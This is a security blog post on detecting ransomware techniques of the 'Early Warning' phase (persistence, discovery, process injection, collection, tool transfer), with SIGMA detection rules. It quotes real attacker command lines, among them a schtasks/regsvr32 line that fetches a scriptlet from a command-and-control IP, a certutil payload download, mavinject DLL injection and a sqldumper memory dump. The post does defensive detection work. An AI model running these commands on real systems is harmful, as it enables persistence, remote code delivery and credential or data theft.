How to Detect Ransomware Attacks in the Early Warning Phase

Keep up to date with latest blog posts

Ransomware attacks have become more prevalent and sophisticated in recent years, and every organization can be the target of these attacks. No matter how strong your defenses are, there is still a chance of being infected by ransomware. However, ransomware threat actors have a long way before reaching their goals. On the way, adversaries unintentionally leave some clues for us to detect and prevent their cyberattacks before they can cause any harm to our organization.

Test your security controls against ransomware

Background

How can we detect and prevent ransomware attacks? In order to answer this question, we built a four-phase approach from the defender's point of view. Ransomware threat actors’ tactics and techniques evolve. However, from the defender’s perspective, the overall ransomware attack lifecycle remains basically unchanged.

The ransomware attack lifecycle consists of four phases:

Phase 1 - Initial Phase

In this phase, ransomware groups gather information on their target and obtain access to the target network. The Initial Phase includes Reconnaissance, Resource Development, Initial Access tactics of the MITRE ATT&CK framework. In our previous blog post, we explained how to detect and prevent ransomware attacks in the Initial Phase.

Phase 2 - Early Warning Phase

Ransomware threat actors  establish persistence, discover the system, gather sensitive data, and improve their capabilities in the target’s network in this phase, which covers Persistence, Privilege Escalation, Command and Control, Discovery, and Collection tactics. This blog post will explain how you can detect and prevent the adversary techniques used in this phase.

Phase 3 - Late Phase

Ransomware operators disable the defense and recovery capabilities  of the victim In the Late Phase, which covers Credential Access, Impact, and Lateral Movement tactics. We will explain ransomware prevention and detection in the late and final phases in our next bog.

Phase 4 - Final Phase

In the Final Phase, ransomware performs its primary objectives: encrypting files in the target system and exfiltrate data. So, Impact and Exfiltration are frequently used tactics in the Final Phase.

See our blog for further details of the ransomware attack lifecycle.

The Early Warning Phase of Ransomware Attack Lifecycle

Early Warning is the second phase of the ransomware attack lifecycle from the defender's perspective.  In this phase, ransomware threat actors tighten their grip on the victim system by establishing persistence, gathering confidential data, and improving their capabilities. Attackers use techniques categorized under Persistence, Privilege Escalation, Discovery, Collection, and Command and Control tactics of the MITRE ATT&CK framework. The Early Warning phase techniques usually abuse native system utilities and may appear as legitimate operations in the log data. Hence, proper log collection and validation are essential to reduce false-positive alerts.

Let's look into preventing and detecting the most abused Early Warning techniques.

Technique 1: Persistence - T1053 Scheduled Task/Job

T1053 Scheduled Task/Job technique describes adversaries' abuse of scheduled tasks or jobs to establish persistence in the victim system. This technique is also categorized under Execution and Privilege Escalation tactics of the MITRE ATT&CK framework. Nearly all operating systems have scheduling functionality to facilitate repetitive activities such as administrative tasks. However, attackers abuse this functionality for malicious code's initial or recurring execution.

In Windows, a built-in utility called schtasks or Scheduled Tasks executes assigned tasks periodically. Usually, administrators use this utility for their legitimate operations; however, after getting initial access, ransomware threat actors establish persistence in the target system by inserting malicious executables into Scheduled Tasks.

For example, Darkside ransomware uses the command given below to execute its malware daily using the Scheduled Tasks utility. 

schtasks /create /sc DAILY /tn "MyTasks\Task1" /tr "C:\update.exe" /st 11:00 /f

Windows Security Event Log ID 4688 and Sysmon Event ID 1 can provide the "Process Creation" log data that can be used to detect such malicious activities. However, we need to fine-tune detection rules; otherwise, periodical administrative tasks created as scheduled tasks may trigger false-positive alerts. We need to fine-tune detection rules to minimize the false-positive alerts.

Let's take a look at the example command used by the APT32 threat group. 

schtasks /create /sc MINUTE /tn "SystemSoundsServices" /tr "\"regsvr32.exe\" /s /n /u /i:http://193.169.245.137:80/g4.ico scrobj.dll" /mo 30 /F .exe" 

The command above creates a scheduled task named "SystemSoundsServices" which mimics the System Sounds Service of Windows to appear as a legitimate service. However, this malicious task downloads and executes a DLL file from the adversaries' command and control server.

logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image: '*\schtasks.exe'
    CommandLine: '*/create* *SystemSoundsServices*'
  condition: selection

Example 1: Example SIGMA rule for detecting use of schtasks by APT32

The SIGMA rule above triggers a detection alert if "schtasks.exe" creates a task named "SystemSoundsServices". Note that this rule catches only a particular task name used by APT32. Although rules developed only against a specific threat group are not effective against other threat actors using the same TTP, it is helpful to write such rules for specific APT groups targeting your organization's industries or regions.

Technique 2: Discovery - T1082 System Information Discovery

Adversaries utilize the T1082 System Information Discovery technique to gather detailed information about their victims. Ransomware threat actors revise their attack methodology using the information they gathered.

systeminfo is a widely used built-in Windows utility that displays detailed information on the software and hardware configuration of the host machine. From the output of the systeminfo, attackers can check missing patches and find vulnerabilities in the victim machine. A detection rule that tracks systeminfo.exe activity may trigger false-positive alerts in case of administrative uses.

Another T1082 System Information Discovery method used by ransomware groups is collecting a unique identifier that defines the victim system. For example, Nefilim and BlackMatter ransomware uses Cryptographic Machine GUID as a unique ID and keeps track of infected systems. The command given below is used to retrieve Cryptographic Machine GUID.

reg.exe QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid 

The SIGMA rule given below creates a detection alert if reg.exe is used to retrieve Cryptographic Machine GUID. Since the reg.exe process is created for the malicious activity, the ideal log source for detection is “Process Creation”. 

logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: \reg.exe
        CommandLine|contains|all:
            - 'SOFTWARE\Microsoft\Cryptography'
            - '/v '
            - 'MachineGuid' 
    condition: selection

Example 2: Example SIGMA rule for detecting MachineGUID access

Technique 3: Privilege Escalation - T1055 Process Injection

T1055 Process Injection technique is a common Privilege Escalation technique that adversaries use to gain higher-level permissions on the victim system. According to the Red Report 2021, Process Injection was the second most used adversary technique in 2021.

Mavinject, Microsoft Application Virtualization Injector, is a legitimate tool used by Windows to inject code into external processes. Adversaries abuse Mavinject for injecting malicious DLLs into running processes, in other words, for DLL injection -  a commonly used sub-technique of Process Injection. 

The command given below injects payload.dll into a process with PID 1337 using Mavinject. To detect this attack, the detection rule should check the log data for  process names ending with mavinject.exe and the command line including "INJECTRUNNING". This technique is rarely used legitimately; therefore, this rule does not generate many false positive alerts. 

mavinject.exe 1337 /INJECTRUNNING c:\payload.dll

There are other T1055 Process Injection methods. For example, Snatch ransomware creates a pipe named "bizkaz" during process injection using the command below. 

cmd.exe /c echo bizkaz > \\.\pipe\bizkaz

The SIGMA rule below scans the "Pipe_Created" log source to detect Snatch ransomware. The rule creates a detection alert if the log data contains "bizkaz" in the PipeName field.

logsource:
    category: pipe_created
    product: windows
detection:
    selection:
      PipeName:
        - '\bizkaz'
    condition: selection

Example 3: Example SIGMA rule for detecting pipe creation

Technique 4: Collection - T1005 Data from Local System

T1005 Data from Local System is a Collection technique that adversaries use to collect critical data from local system resources such as file systems and local databases. Ransomware threat actors gather the victim's sensitive data and prepare for the data exfiltration steps in the Final Phase.

SQLDumper is a built-in debugging utility included with Microsoft SQL. Attackers abuse SQLDumper to dump data from local SQL servers. For example, the DarkSide ransomware group uses SQLDumper to generate a full dump file of the SQL Server process. In addition, adversaries use SQLDumper to dump the memory of other processes such as lsass to dump credentials.

sqldumper.exe 464 0 0x01100

"0x01100" parameter in SQLDumper corresponds to the full dump file option. The detection rule for the example command given above should use the log data from the "Process Creation" log data. The detection rule should create a detection alert if the log data contains "sqldumper.exe" in the image field and "0x01100" in the command-line field. Note that such a rule would create false-positive alerts if an administrator uses sqldumper to create full dump files of processes.

Technique 5: Command and Control - T1105 Ingress Tool Transfer 

Although attackers generally use built-in tools for their malicious activities, adversaries use to bring custom tools to the victim system for their specific needs using the T1105 Ingress Tool Transfer technique. Recent ransomware attack campaigns use multi-stage payloads to evade defenses. The first stage payload of the ransomware prepares the victim system for the following stages. Then, the additional payload or payloads is transferred from an external system.

T1105 Ingress Tool Transfer technique covers transferring tools or other files into a compromised environment over a command and control channel as a technique to download additional payloads.

CertUtil is a built-in Windows command-line tool that attackers frequently misuse to download files to the target system. The DarkSide ransomware group uses the command below to download the second-stage payload. 

certutil.exe -urlcache -split -f <C2_Server_IP>/payload.exe C:/Temp/update.exe

CertUtil requires some parameters such as "url-cache" to download files, so we can use these parameters to detect file download attempts. The SIGMA rule given below uses the log data from the "Process Creation" log source. The rule creates a detection alert if the log data contains "certutil.exe" in the image field with parameters required for file download. It is important to add other parameters that can be used for file download to the SIGMA rule to improve detection coverage.

logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\certutil.exe'
        CommandLine|contains:
' /urlcache '
' -urlcache '
' /verifyctl '
' -verifyctl '
    condition: selection

Example 4: Example SIGMA rule for detecting CertUtil misuse

Subscribe

Keep up to date with latest blog posts